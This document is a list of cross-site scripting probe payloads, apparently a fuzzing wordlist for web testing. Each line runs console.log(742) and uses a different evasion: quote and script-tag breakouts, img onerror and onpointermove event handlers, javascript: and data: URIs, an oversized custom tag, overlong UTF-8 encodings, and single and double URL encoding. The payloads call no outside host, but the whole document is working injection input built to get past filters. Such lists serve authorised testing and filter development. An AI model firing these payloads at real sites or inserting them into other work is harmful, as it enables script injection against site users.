console.log(742)
javascript:console.log(742)
data:text/javascript,console.log(742)
'; console.log(742);//
"; console.log(742);//
\'; console.log(742);//
\"; console.log(742);//
\u0027; console.log(742);//
\u0022; console.log(742);//
<script>console.log(742);
<script>console.log(742);</script>
<<script>console.log(742);</script>
<script>console.log(742);</script
<script%0a>console.log(742);</script
<script src="data:text/javascript,console.log(742)"></script>
<script src="data:text/javascript,console.log(742)"></script
<script%0a src="data:text/javascript,console.log(742)"></script
<img src/onerror=console.log(742)>
<p onpointermove=console.log(742)>w1ndsor</p>
<p onpointermove=console.log(742)>
<a href=javascript:console.log(742)>w1ndsor</a>
<fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1 onpointermove="console.log(742)">w1ndsor</fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1>
><fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1 onpointermove="console.log(742)">w1ndsor</fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1>
";</script><script>console.log(742);</script>
';</script><script>console.log(742);</script>
";</script><img src/onerror=console.log(742)>
';</script><img src/onerror=console.log(742)>
></script><script>console.log(742);</script>
><img src/onerror=console.log(742)>
<<img src/onerror=console.log(742)>
x onpointermove=console.log(742)
x" onpointermove="console.log(742)"
x' onpointermove='console.log(742)'
%C0%BCscript>console.log(742)</script> %E0%80%BCscript>console.log(742)</script> %F0%80%80%BCscript>console.log(742)</script> %F8%80%80%80%BCscript>console.log(742)</script> %FC%80%80%80%80%BCscript>console.log(742)</script>
%3c%73%63%72%69%70%74%3e%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%37%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e
%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%36%33%25%36%66%25%36%65%25%37%33%25%36%66%25%36%63%25%36%35%25%32%65%25%36%63%25%36%66%25%36%37%25%32%38%25%33%37%25%33%34%25%33%32%25%32%39%25%33%62%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65
